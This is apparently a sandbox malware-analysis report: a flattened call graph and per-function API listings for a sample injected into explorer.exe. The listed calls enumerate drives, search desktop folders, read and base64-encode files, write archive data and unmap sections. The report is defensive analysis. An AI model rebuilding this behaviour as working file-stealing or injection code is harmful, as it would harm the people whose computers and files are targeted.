9209 30c8e9a __realloc_crt 58 API calls 9206->9209 9210 30ca702 RtlEncodePointer 9206->9210 9207 30ca6c3 9207->9205 9207->9206 9222 30c8e9a 9207->9222 9211 30ca6fc 9209->9211 9210->9205 9211->9203 9211->9210 9246 30c818f 9212->9246 9216 30ce35e RtlSizeHeap 9215->9216 9217 30ce349 9215->9217 9216->9207 9218 30c92f0 __filbuf 55 API calls 9217->9218 9219 30ce34e 9218->9219 9220 30c9281 __filbuf 8 API calls 9219->9220 9221 30ce359 9220->9221 9221->9207 9225 30c8ea1 9222->9225 9224 30c8ede 9224->9206 9225->9224 9227 30caecd 9225->9227 9245 30c8dd2 Sleep 9225->9245 9228 30caed6 9227->9228 9229 30caee1 9227->9229 9230 30cae3b _malloc 55 API calls 9228->9230 9231 30caee9 9229->9231 9237 30caef6 _malloc 9229->9237 9232 30caede 9230->9232 9233 30c88fa _free 55 API calls 9231->9233 9232->9225 9244 30caef1 _free 9233->9244 9234 30caf2e _malloc 9238 30c92f0 __filbuf 55 API calls 9234->9238 9235 30caefe RtlReAllocateHeap 9235->9237 9235->9244 9236 30caf5e 9239 30c92f0 __filbuf 55 API calls 9236->9239 9237->9234 9237->9235 9237->9236 9241 30caf46 9237->9241 9238->9244 9240 30caf63 GetLastError 9239->9240 9240->9244 9242 30c92f0 __filbuf 55 API calls 9241->9242 9243 30caf4b GetLastError 9242->9243 9243->9244 9244->9225 9245->9225 9249 30ca298 RtlLeaveCriticalSection 9246->9249 9248 30c8196 9248->9197 9249->9248 9251 30caf9e _malloc 9250->9251 9252 30caf83 9250->9252 9255 30cafae RtlAllocateHeap 9251->9255 9256 30caf94 9251->9256 9252->9251 9253 30caf8f 9252->9253 9254 30c92f0 __filbuf 54 API calls 9253->9254 9254->9256 9255->9251 9255->9256 9256->8675 9257->8675 9264 30ca298 RtlLeaveCriticalSection 9258->9264 9260 30c7d47 9260->8685 9265 30ca298 RtlLeaveCriticalSection 9261->9265 9263 30c7d95 9263->8688 9264->9260 9265->9263 9267 30c7afe _raise 9266->9267 9268 30c7b17 9267->9268 9269 30c7c06 _raise 9267->9269 9270 30c88fa _free 55 API calls 9267->9270 9271 30c7b26 9268->9271 9272 30c88fa _free 55 API calls 9268->9272 9269->8696 9270->9268 9273 30c7b35 9271->9273 9275 30c88fa _free 55 API calls 9271->9275 9272->9271 9274 30c7b44 9273->9274 9276 30c88fa _free 55 API calls 9273->9276 9277 30c7b53 9274->9277 9278 30c88fa _free 55 API calls 9274->9278 9275->9273 9276->9274 9279 30c7b62 9277->9279 9280 30c88fa _free 55 API calls 9277->9280 9278->9277 9281 30c7b71 9279->9281 9283 30c88fa _free 55 API calls 9279->9283 9280->9279 9282 30c7b83 9281->9282 9284 30c88fa _free 55 API calls 9281->9284 9285 30ca12e __lock 55 API calls 9282->9285 9283->9281 9284->9282 9288 30c7b8b 9285->9288 9286 30c7bae 9298 30c7c12 9286->9298 9288->9286 9290 30c88fa _free 55 API calls 9288->9290 9290->9286 9291 30ca12e __lock 55 API calls 9296 30c7bc2 ___removelocaleref 9291->9296 9292 30c7bf3 9301 30c7c1e 9292->9301 9295 30c88fa _free 55 API calls 9295->9269 9296->9292 9297 30c93d9 ___freetlocinfo 55 API calls 9296->9297 9297->9292 9304 30ca298 RtlLeaveCriticalSection 9298->9304 9300 30c7bbb 9300->9291 9305 30ca298 RtlLeaveCriticalSection 9301->9305 9303 30c7c00 9303->9295 9304->9300 9305->9303 9307 30c11c4 ___DllMainCRTStartup VirtualQuery 9306->9307 9308 30c1f8a 9307->9308 9309 30c1f8e 9308->9309 9316 30c1000 GetProcessHeap RtlAllocateHeap 9308->9316 9309->8533 9311 30c1f9a RtlMoveMemory NtUnmapViewOfSection 9317 30c1d9b 9311->9317 9313 30c1fba 9314 30c1fcb 9313->9314 9315 30c1f82 ___DllMainCRTStartup 60 API calls 9313->9315 9314->8533 9315->9314 9316->9311 9342 30c1000 GetProcessHeap RtlAllocateHeap 9317->9342 9319 30c1dae 9343 30c1000 GetProcessHeap RtlAllocateHeap 9319->9343 9321 30c1dba 9344 30c1000 GetProcessHeap RtlAllocateHeap 9321->9344 9323 30c1ddb wsprintfA 9324 30c1dff 9323->9324 9326 30c1e16 StrStrA 9324->9326 9327 30c1f50 RtlZeroMemory RtlZeroMemory Sleep 9324->9327 9345 30c1185 OpenFileMappingA 9324->9345 9328 30c1e2c StrStrA 9326->9328 9329 30c1f3f 9326->9329 9327->9324 9328->9329 9333 30c1e45 9328->9333 9382 30c11b1 UnmapViewOfFile CloseHandle 9329->9382 9332 30c1e57 RtlMoveMemory RtlComputeCrc32 9332->9329 9332->9333 9333->9329 9335 30c1e8e RtlZeroMemory StrChrA 9333->9335 9338 30c126a lstrlen RtlMoveMemory ___DllMainCRTStartup 9333->9338 9339 30c1011 GetProcessHeap RtlFreeHeap VirtualQuery ___DllMainCRTStartup 9333->9339 9340 30c1cf3 8 API calls ___DllMainCRTStartup 9333->9340 9348 30c1000 GetProcessHeap RtlAllocateHeap 9333->9348 9349 30c1000 GetProcessHeap RtlAllocateHeap 9333->9349 9350 30c1a96 9333->9350 9336 30c1ea9 RtlMoveMemory 9335->9336 9337 30c1ed5 RtlMoveMemory 9335->9337 9336->9333 9337->9333 9338->9333 9339->9333 9340->9333 9342->9319 9343->9321 9344->9323 9346 30c11ac 9345->9346 9347 30c1199 MapViewOfFile 9345->9347 9346->9324 9347->9346 9348->9332 9349->9333 9383 30c1000 GetProcessHeap RtlAllocateHeap 9350->9383 9352 30c1ab2 GetTempPathW GetTempFileNameW DeleteFileW PathRemoveExtensionW StrRChrW 9353 30c1b09 CreateDirectoryW 9352->9353 9354 30c1ceb 9352->9354 9353->9354 9355 30c1b1e 9353->9355 9354->9329 9369 30c1bee 9355->9369 9384 30c1000 GetProcessHeap RtlAllocateHeap 9355->9384 9357 30c1cd6 9387 30c176f 9357->9387 9358 30c1b39 GetLogicalDriveStringsW 9359 30c1be3 9358->9359 9368 30c1b4d 9358->9368 9360 30c1011 ___DllMainCRTStartup 3 API calls 9359->9360 9360->9369 9362 30c1b53 GetDriveTypeW 9362->9368 9364 30c1011 ___DllMainCRTStartup 3 API calls 9364->9354 9367 30c1bae lstrlenW 9367->9362 9371 30c1bc0 WaitForMultipleObjects 9367->9371 9368->9362 9368->9367 9385 30c1000 GetProcessHeap RtlAllocateHeap 9368->9385 9386 30c1000 GetProcessHeap RtlAllocateHeap 9368->9386 9369->9357 9379 30c1011 GetProcessHeap RtlFreeHeap VirtualQuery ___DllMainCRTStartup 9369->9379 9390 30c1090 9369->9390 9397 30c1000 GetProcessHeap RtlAllocateHeap 9369->9397 9398 30c1000 GetProcessHeap RtlAllocateHeap 9369->9398 9399 30c18e0 9369->9399 9371->9359 9373 30c1bd4 CloseHandle 9371->9373 9372 30c1b7b lstrcatW CreateThread 9372->9367 9421 30c1a6a 9372->9421 9373->9359 9373->9373 9375 30c1c43 StrStrIW 9376 30c1c75 ExpandEnvironmentStringsW 9375->9376 9377 30c1c55 SHGetFolderPathW 9375->9377 9376->9369 9377->9369 9378 30c1c64 PathFindFileNameW PathAppendW 9377->9378 9378->9369 9379->9369 9382->9327 9383->9352 9384->9358 9385->9368 9386->9372 9388 30c17b4 9387->9388 9389 30c1780 RtlZeroMemory lstrlenW SHFileOperationW 9387->9389 9388->9364 9389->9388 9391 30c109a lstrlen 9390->9391 9396 30c10cd 9390->9396 9418 30c1000 GetProcessHeap RtlAllocateHeap 9391->9418 9393 30c10b0 MultiByteToWideChar 9394 30c10c6 9393->9394 9393->9396 9395 30c1011 ___DllMainCRTStartup 3 API calls 9394->9395 9395->9396 9396->9369 9397->9375 9398->9369 9400 30c18fa 9399->9400 9401 30c1a62 9399->9401 9400->9401 9419 30c1000 GetProcessHeap RtlAllocateHeap 9400->9419 9401->9369 9403 30c190d lstrcatW 9404 30c1944 lstrcatW PathRemoveFileSpecW 9403->9404 9405 30c1934 PathCombineW 9403->9405 9406 30c1950 FindFirstFileExW 9404->9406 9405->9406 9407 30c1a5b 9406->9407 9413 30c1973 ___DllMainCRTStartup 9406->9413 9408 30c1011 ___DllMainCRTStartup 3 API calls 9407->9408 9408->9401 9409 30c198c lstrcmpiW 9409->9413 9410 30c1a3c FindNextFileW 9412 30c1a50 FindClose 9410->9412 9410->9413 9411 30c1a0b PathCombineW 9411->9413 9412->9407 9413->9409 9413->9410 9413->9411 9417 30c1011 ___DllMainCRTStartup 3 API calls 9413->9417 9420 30c1000 GetProcessHeap RtlAllocateHeap 9413->9420 9415 30c19ad PathCombineW 9416 30c18e0 ___DllMainCRTStartup 5 API calls 9415->9416 9416->9413 9417->9413 9418->9393 9419->9403 9420->9415 9422 30c1a8d RtlExitUserThread 9421->9422 9423 30c1a73 9421->9423 9423->9422 9424 30c18e0 ___DllMainCRTStartup 15 API calls 9423->9424 9425 30c1a7f 9424->9425 9426 30c1011 ___DllMainCRTStartup 3 API calls 9425->9426 9427 30c1a86 9426->9427 9428 30c1011 ___DllMainCRTStartup 3 API calls 9427->9428 9428->9422 9434 30c2313 9435 30c2334 9434->9435 9443 30c276e 9435->9443 9438 30c2365 9439 30c2345 lstrlenW 9447 30c2240 9439->9447 9444 30c277f 9443->9444 9463 30c268d 9444->9463 9446 30c233f 9446->9438 9446->9439 9488 30c2066 9447->9488 9449 30c2262 9450 30c230a 9449->9450 9451 30c226a FindFirstFileW 9449->9451 9460 30c32a8 9450->9460 9451->9450 9455 30c2289 9451->9455 9452 30c22f1 FindNextFileW 9453 30c2303 FindClose 9452->9453 9452->9455 9453->9450 9454 30c2066 PathCombineW 9454->9455 9455->9452 9455->9453 9455->9454 9456 30c2240 73 API calls 9455->9456 9491 30c2110 9455->9491 9517 30c3295 9455->9517 9457 30c22de 9456->9457 9457->9452 9675 30c32b0 9460->9675 9464 30c269a __ftelli64_nolock 9463->9464 9469 30c3ae0 9464->9469 9466 30c26d9 9467 30cae3b _malloc 55 API calls 9466->9467 9468 30c26e3 _memmove 9466->9468 9467->9468 9468->9446 9470 30c3af0 9469->9470 9471 30c3af2 9469->9471 9473 30c37b0 9470->9473 9471->9466 9474 30c37d2 9473->9474 9475 30c37f5 9474->9475 9476 30c37de CreateFileW 9474->9476 9482 30c3774 9475->9482 9476->9475 9478 30c382c 9478->9471 9479 30c37fc __NMSG_WRITE 9479->9478 9480 30cae3b _malloc 55 API calls 9479->9480 9481 30c381d wcsncpy 9480->9481 9481->9478 9483 30c377e 9482->9483 9484 30c379c _memset 9482->9484 9483->9484 9485 30cae3b _malloc 55 API calls 9483->9485 9484->9479 9486 30c378a 9485->9486 9486->9484 9487 30c3791 CloseHandle 9486->9487 9487->9484 9489 30c2085 PathCombineW 9488->9489 9490 30c2073 9488->9490 9489->9449 9490->9489 9492 30c2066 PathCombineW 9491->9492 9493 30c2137 9492->9493 9494 30c213f CreateFileW 9493->9494 9495 30c2234 9493->9495 9494->9495 9496 30c2161 CloseHandle 9494->9496 9495->9455 9497 30c2181 _memset 9496->9497 9520 30c20c1 FindFirstFileW 9497->9520 9504 30c222b 9506 30c88fa _free 55 API calls 9504->9506 9505 30c21b5 CreateFileW 9507 30c21cf 9505->9507 9508 30c2223 9505->9508 9506->9495 9510 30cae3b _malloc 55 API calls 9507->9510 9537 30c329f 9508->9537 9516 30c21d9 9510->9516 9511 30c21e0 ReadFile 9512 30c2211 9511->9512 9511->9516 9513 30c88fa _free 55 API calls 9512->9513 9515 30c2217 CloseHandle 9513->9515 9515->9508 9516->9511 9516->9512 9533 30c2dc2 9516->9533 9646 30c2ec5 9517->9646 9521 30c210a 9520->9521 9522 30c20e3 FileTimeToLocalFileTime FileTimeToDosDateTime FindClose 9520->9522 9523 30c2018 lstrlenW 9521->9523 9522->9521 9540 30c1fd1 9523->9540 9526 30c2057 9530 30c2c7e 9526->9530 9527 30cae3b _malloc 55 API calls 9528 30c2044 9527->9528 9528->9526 9529 30c1fd1 2 API calls 9528->9529 9529->9526 9544 30c27a9 9530->9544 9534 30c2dda 9533->9534 9535 30c2de2 9533->9535 9534->9516 9535->9534 9640 30c2c90 9535->9640 9538 30c3295 60 API calls 9537->9538 9539 30c32a6 9538->9539 9539->9504 9541 30c1fe7 WideCharToMultiByte 9540->9541 9542 30c1fe0 lstrlenW 9540->9542 9543 30c2007 9541->9543 9542->9541 9543->9526 9543->9527 9545 30c27cf 9544->9545 9560 30c21b1 9544->9560 9546 30c329f 60 API calls 9545->9546 9549 30c27da _strlen 9545->9549 9546->9549 9547 30c28a5 9582 30c3b59 9547->9582 9548 30c2879 9604 30c250e 9548->9604 9549->9547 9549->9548 9553 30c2451 2 API calls 9549->9553 9549->9560 9552 30c28b6 9556 30cae3b _malloc 55 API calls 9552->9556 9553->9548 9557 30c290f 9556->9557 9558 30c2be8 9557->9558 9587 30c2451 9557->9587 9558->9560 9596 30c4153 9558->9596 9560->9504 9560->9505 9563 30c2451 2 API calls 9564 30c2b06 9563->9564 9564->9558 9565 30c2451 2 API calls 9564->9565 9566 30c2b26 9565->9566 9566->9558 9567 30c2451 2 API calls 9566->9567 9568 30c2b46 9567->9568 9568->9558 9569 30c2451 2 API calls 9568->9569 9570 30c2b63 9569->9570 9570->9558 9571 30c2451 2 API calls 9570->9571 9572 30c2b7b 9571->9572 9572->9558 9573 30c2451 2 API calls 9572->9573 9574 30c2b8f 9573->9574 9574->9558 9575 30c2451 2 API calls 9574->9575 9576 30c2ba3 9575->9576 9576->9558 9577 30c2451 2 API calls 9576->9577 9578 30c2bbb 9577->9578 9578->9558 9579 30c2451 2 API calls 9578->9579 9580 30c2bcf 9579->9580 9580->9558 9591 30c390e 9580->9591 9583 30c3b63 9582->9583 9585 30c3b67 9582->9585 9612 30c39a8 9583->9612 9585->9552 9588 30c246c _memset 9587->9588 9590 30c390e 2 API calls 9588->9590 9589 30c24a4 9589->9558 9589->9563 9590->9589 9592 30c394c 9591->9592 9593 30c391e 9591->9593 9592->9558 9593->9592 9594 30c3923 WriteFile 9593->9594 9594->9592 9595 30c393b GetLastError 9594->9595 9595->9592 9597 30c416d 9596->9597 9601 30c4165 9596->9601 9597->9601 9621 30c7604 9597->9621 9599 30c422e 9599->9601 9624 30c4be8 9599->9624 9601->9560 9603 30c7604 55 API calls 9603->9599 9605 30c2523 9604->9605 9606 30c3b59 3 API calls 9605->9606 9607 30c252d 9606->9607 9607->9547 9608 30c260f 9607->9608 9609 30c2687 9608->9609 9611 30c262e 9608->9611 9609->9547 9610 30c250e 3 API calls 9610->9611 9611->9609 9611->9610 9613 30c39bb 9612->9613 9614 30c39ea 9612->9614 9613->9614 9618 30c3956 SetFilePointer 9613->9618 9614->9552 9617 30c39dd GetLastError 9617->9614 9619 30c398d 9618->9619 9620 30c3980 GetLastError 9618->9620 9619->9614 9619->9617 9620->9619 9622 30cae3b _malloc 55 API calls 9621->9622 9623 30c41d3 9622->9623 9623->9601 9623->9603 9627 30c4bf0 9624->9627 9625 30c4bf4 9625->9601 9626 30c4c0f 9628 30c4c21 9626->9628 9634 30c7619 55 API calls 9626->9634 9627->9625 9627->9626 9637 30c7619 9627->9637 9629 30c4c33 9628->9629 9635 30c7619 55 API calls 9628->9635 9630 30c4c45 9629->9630 9636 30c7619 55 API calls 9629->9636 9632 30c7619 55 API calls 9630->9632 9631 30c4c4e 9631->9601 9632->9631 9634->9628 9635->9629 9636->9630 9638 30c88fa _free 55 API calls 9637->9638 9639 30c7624 9638->9639 9639->9626 9642 30c2cb5 9640->9642 9641 30c250e 3 API calls 9641->9642 9642->9641 9643 30c2d87 9642->9643 9644 30c260f 3 API calls 9642->9644 9645 30c390e 2 API calls 9642->9645 9643->9535 9644->9642 9645->9642 9648 30c2ef0 9646->9648 9665 30c2ee8 9646->9665 9647 30c2f51 9649 30c2f6c 9647->9649 9651 30c2c90 5 API calls 9647->9651 9648->9647 9650 30c2c90 5 API calls 9648->9650 9648->9665 9652 30c4be8 55 API calls 9649->9652 9653 30c2f90 9649->9653 9650->9648 9651->9649 9652->9653 9654 30c2451 2 API calls 9653->9654 9657 30c303b 9653->9657 9655 30c2fd1 9654->9655 9656 30c2451 2 API calls 9655->9656 9655->9657 9658 30c2fe7 9656->9658 9662 30c326a 9657->9662 9657->9665 9666 30c23bb 9657->9666 9658->9657 9659 30c2451 2 API calls 9658->9659 9660 30c3015 9659->9660 9660->9657 9661 30c2451 2 API calls 9660->9661 9661->9657 9663 30c88fa _free 55 API calls 9662->9663 9663->9665 9665->9455 9667 30c23d2 9666->9667 9669 30c23cd 9666->9669 9671 30c23dd 9667->9671 9672 30c236c 9667->9672 9669->9662 9670 30c236c 55 API calls 9670->9671 9671->9669 9671->9670 9673 30cae3b _malloc 55 API calls 9672->9673 9674 30c2376 9673->9674 9674->9671 9678 30c32b9 9675->9678 9679 30c32ae 9678->9679 9680 30c32d7 9678->9680 9679->9438 9681 30c329f 60 API calls 9680->9681 9683 30c32e2 9680->9683 9681->9683 9682 30c3b59 3 API calls 9686 30c3335 9682->9686 9683->9682 9684 30c337c 9738 30c23a8 9684->9738 9686->9684 9737 30c390e 2 API calls 9686->9737 9687 30c3b59 3 API calls 9689 30c33cc 9687->9689 9690 30c2451 2 API calls 9689->9690 9691 30c33e4 9690->9691 9692 30c3693 _strlen 9691->9692 9693 30c2451 2 API calls 9691->9693 9697 30c2451 2 API calls 9692->9697 9702 30c36bf 9692->9702 9695 30c33fd 9693->9695 9694 30c2451 2 API calls 9696 30c358e 9694->9696 9695->9692 9698 30c2451 2 API calls 9695->9698 9696->9692 9699 30c2451 2 API calls 9696->9699 9697->9702 9700 30c3415 9698->9700 9701 30c35ae 9699->9701 9700->9692 9704 30c2451 2 API calls 9700->9704 9701->9692 9703 30c2451 2 API calls 9701->9703 9705 30c370a 9702->9705 9708 30c88fa _free 55 API calls 9702->9708 9710 30c35ce 9703->9710 9707 30c342e 9704->9707 9706 30c88fa _free 55 API calls 9705->9706 9706->9679 9707->9692 9709 30c2451 2 API calls 9707->9709 9708->9705 9711 30c344b 9709->9711 9710->9692 9712 30c2451 2 API calls 9710->9712 9711->9692 9713 30c2451 2 API calls 9711->9713 9716 30c3608 9712->9716 9714 30c3468 9713->9714 9714->9692 9715 30c2451 2 API calls 9714->9715 9717 30c348a 9715->9717 9716->9692 9718 30c2451 2 API calls 9716->9718 9717->9692 9720 30c2451 2 API calls 9717->9720 9719 30c3646 9718->9719 9719->9692 9721 30c2451 2 API calls 9719->9721 9722 30c34ac 9720->9722 9725 30c365c 9721->9725 9722->9692 9723 30c2451 2 API calls 9722->9723 9724 30c34c6 9723->9724 9724->9692 9727 30c2451 2 API calls 9724->9727 9725->9692 9726 30c2451 2 API calls 9725->9726 9726->9692 9728 30c34f0 9727->9728 9728->9692 9729 30c2451 2 API calls 9728->9729 9730 30c350c 9729->9730 9730->9692 9731 30c2451 2 API calls 9730->9731 9732 30c3529 9731->9732 9732->9692 9733 30c2451 2 API calls 9732->9733 9734 30c3553 9733->9734 9734->9692 9735 30c2451 2 API calls 9734->9735 9736 30c3572 9735->9736 9736->9692 9736->9694 9737->9686 9741 30c238a 9738->9741 9742 30c238e 9741->9742 9744 30c239e 9741->9744 9743 30c88fa _free 55 API calls 9742->9743 9742->9744 9743->9742 9744->9687 9744->9736 8390 30c16ea ReadFile 8391 30c174c 8390->8391 8392 30c170e 8390->8392 8420 30c1011 8391->8420 8392->8391 8402 30c1221 8392->8402 8400 30c1745 8401 30c1011 ___DllMainCRTStartup 3 API calls 8400->8401 8401->8391 8403 30c1261 8402->8403 8404 30c1232 CryptBinaryToStringA 8402->8404 8403->8391 8408 30c15f1 8403->8408 8404->8403 8405 30c1245 8404->8405 8425 30c1000 GetProcessHeap RtlAllocateHeap 8405->8425 8407 30c1250 CryptBinaryToStringA 8407->8403 8409 30c1614 8408->8409 8410 30c1607 lstrlen 8408->8410 8426 30c1000 GetProcessHeap RtlAllocateHeap 8409->8426 8410->8409 8412 30c161c lstrcat 8413 30c1658 8412->8413 8414 30c1651 lstrcat 8412->8414 8427 30c1342 8413->8427 8414->8413 8417 30c1011 ___DllMainCRTStartup 3 API calls 8418 30c167b 8417->8418 8419 30c105d VirtualFree 8418->8419 8419->8400 8457 30c11c4 VirtualQuery 8420->8457 8423 30c102d CloseHandle DeleteFileW 8424 30c101d GetProcessHeap RtlFreeHeap 8424->8423 8425->8407 8426->8412 8450 30c1000 GetProcessHeap RtlAllocateHeap 8427->8450 8429 30c1366 8451 30c106c lstrlen MultiByteToWideChar 8429->8451 8431 30c1375 8452 30c12b2 RtlZeroMemory 8431->8452 8434 30c13c7 RtlZeroMemory 8437 30c13fc 8434->8437 8435 30c1011 ___DllMainCRTStartup 3 API calls 8436 30c15e6 8435->8436 8436->8417 8438 30c15c9 8437->8438 8454 30c1000 GetProcessHeap RtlAllocateHeap 8437->8454 8438->8435 8440 30c14b8 wsprintfW 8441 30c14d8 8440->8441 8449 30c15b3 8441->8449 8455 30c1000 GetProcessHeap RtlAllocateHeap 8441->8455 8442 30c1011 ___DllMainCRTStartup 3 API calls 8442->8438 8444 30c1546 8445 30c15ac 8444->8445 8456 30c104c VirtualAlloc 8444->8456 8447 30c1011 ___DllMainCRTStartup 3 API calls 8445->8447 8447->8449 8448 30c159c RtlMoveMemory 8448->8445 8449->8442 8450->8429 8451->8431 8453 30c12d4 8452->8453 8453->8434 8453->8438 8454->8440 8455->8444 8456->8448 8458 30c1019 8457->8458 8458->8423 8458->8424

                                                                                                                                      Executed Functions

                                                                                                                                      Function 030C1A96 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 197stringfilethreadCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 030C1000: GetProcessHeap.KERNEL32(00000008,00000208,030C1AB2,?,?), ref: 030C1003
                                                                                                                                        • Part of subcall function 030C1000: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 030C100A
                                                                                                                                      • GetTempPathW.KERNEL32(00000104,00000000,?,?), ref: 030C1ABE
                                                                                                                                      • GetTempFileNameW.KERNEL32(033D3FE8,00000000,00000000,033D3FE8,?,?), ref: 030C1ACF
                                                                                                                                      • DeleteFileW.KERNEL32(?,?), ref: 030C1ADB
                                                                                                                                      • PathRemoveExtensionW.SHLWAPI(?,?), ref: 030C1AE7
                                                                                                                                      • StrRChrW.SHLWAPI(00000000,0000005C,?,?), ref: 030C1AF6
                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,?,?), ref: 030C1B10
                                                                                                                                      • GetLogicalDriveStringsW.KERNEL32(00000104,00000000,?,?), ref: 030C1B3F
                                                                                                                                      • GetDriveTypeW.KERNEL32(?,?,?), ref: 030C1B54
                                                                                                                                      • lstrcatW.KERNEL32(00000000,?,?,?), ref: 030C1B7F
                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,030C1A6A,00000000,00000000,00000000), ref: 030C1BA3
                                                                                                                                      • lstrlenW.KERNEL32(?,?,?), ref: 030C1BAF
                                                                                                                                      • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF,?,?), ref: 030C1BCA
                                                                                                                                      • CloseHandle.KERNEL32(?,?,?), ref: 030C1BD8
                                                                                                                                      • StrStrIW.SHLWAPI(00000000,%DESKTOP%,?,?), ref: 030C1C4B
                                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 030C1C5A
                                                                                                                                      • PathFindFileNameW.SHLWAPI(00000000,?,?), ref: 030C1C65
                                                                                                                                      • PathAppendW.SHLWAPI(00000000,00000000,?,?), ref: 030C1C6D
                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00008000,?,?), ref: 030C1C7C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Path$File$CreateDriveHeapNameStringsTemp$AllocateAppendCloseDeleteDirectoryEnvironmentExpandExtensionFindFolderHandleLogicalMultipleObjectsProcessRemoveThreadTypeWaitlstrcatlstrlen
                                                                                                                                      • String ID: %DESKTOP%
                                                                                                                                      • API String ID: 825410880-4272197009
                                                                                                                                      • Opcode ID: f8981cf725e5acf11f0910bf6c1dd2c180185c38f8f7fb467d1ce4e42d3d89ac
                                                                                                                                      • Instruction ID: 74bfcc1619a55539bca1cc9905a5e962fe4f1dab225f5148444eef00c1ec1d87
                                                                                                                                      • Opcode Fuzzy Hash: f8981cf725e5acf11f0910bf6c1dd2c180185c38f8f7fb467d1ce4e42d3d89ac
                                                                                                                                      • Instruction Fuzzy Hash: 32519035213390ABC728FF75EC88A6EBBE9EF49751B14451CFD05CA186DB789810CB94
                                                                                                                                      Function 030C18E0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 133stringfileCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 105 30c18e0-30c18f4 106 30c18fa-30c18fd 105->106 107 30c1a62-30c1a69 105->107 106->107 108 30c1903-30c1932 call 30c1000 lstrcatW 106->108 111 30c1944-30c194a lstrcatW PathRemoveFileSpecW 108->111 112 30c1934-30c1942 PathCombineW 108->112 113 30c1950-30c196d FindFirstFileExW 111->113 112->113 114 30c1a5b-30c1a5d call 30c1011 113->114 115 30c1973 113->115 114->107 117 30c1977-30c197d 115->117 118 30c19fe-30c1a09 call 30c11fa 117->118 119 30c197f-30c198a call 30c11fa 117->119 126 30c1a3c-30c1a4a FindNextFileW 118->126 127 30c1a0b-30c1a1b PathCombineW 118->127 124 30c198c-30c199d lstrcmpiW 119->124 125 30c19f6-30c19fc 119->125 124->125 130 30c199f-30c19a3 124->130 125->118 125->126 126->117 131 30c1a50-30c1a57 FindClose 126->131 128 30c1a2c-30c1a33 127->128 129 30c1a1d-30c1a2a 127->129 128->126 132 30c1a35-30c1a37 call 30c17b9 128->132 129->126 130->125 133 30c19a5-30c19e4 call 30c1000 PathCombineW call 30c18e0 130->133 131->114 132->126 139 30c19e9-30c19f4 call 30c1011 133->139 139->126
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 030C1000: GetProcessHeap.KERNEL32(00000008,00000208,030C1AB2,?,?), ref: 030C1003
                                                                                                                                        • Part of subcall function 030C1000: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 030C100A
                                                                                                                                      • lstrcatW.KERNEL32(00000208,00000000,00000000,00000000,?,00000000), ref: 030C192C
                                                                                                                                      • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 030C193C
                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,?,00000000), ref: 030C1947
                                                                                                                                      • PathRemoveFileSpecW.SHLWAPI(00000208,?,00000000), ref: 030C194A
                                                                                                                                      • FindFirstFileExW.KERNEL32(00000000,00000001,?,00000000,00000000,00000002,?,00000000), ref: 030C195E
                                                                                                                                      • lstrcmpiW.KERNEL32(?,?,00000000), ref: 030C1995
                                                                                                                                      • PathCombineW.SHLWAPI(00000410,00000208,?,?,?,00000000), ref: 030C19BC
                                                                                                                                      • PathCombineW.SHLWAPI(?,00000208,?,?,00000000), ref: 030C1A10
                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 030C1A42
                                                                                                                                      • FindClose.KERNEL32(00000000,?,00000000), ref: 030C1A51
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Path$CombineFileFind$Heaplstrcat$AllocateCloseFirstNextProcessRemoveSpeclstrcmpi
                                                                                                                                      • String ID: *.*
                                                                                                                                      • API String ID: 1316406203-438819550
                                                                                                                                      • Opcode ID: de5107fe2358f862d634beae506849bc148115a8ccda488e74d1d59d0a9915e8
                                                                                                                                      • Instruction ID: dee8e29754ca9ab939309a6bafc06bf8fc0d70bc3d3172e623525624c997e414
                                                                                                                                      • Opcode Fuzzy Hash: de5107fe2358f862d634beae506849bc148115a8ccda488e74d1d59d0a9915e8
                                                                                                                                      • Instruction Fuzzy Hash: 2F41AD34212345ABC718EF24DC84BAEB7E8FB49250F04491DE95697282DB39E9518B50
                                                                                                                                      Function 030C2240 Relevance: 4.6, APIs: 3, Instructions: 68fileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
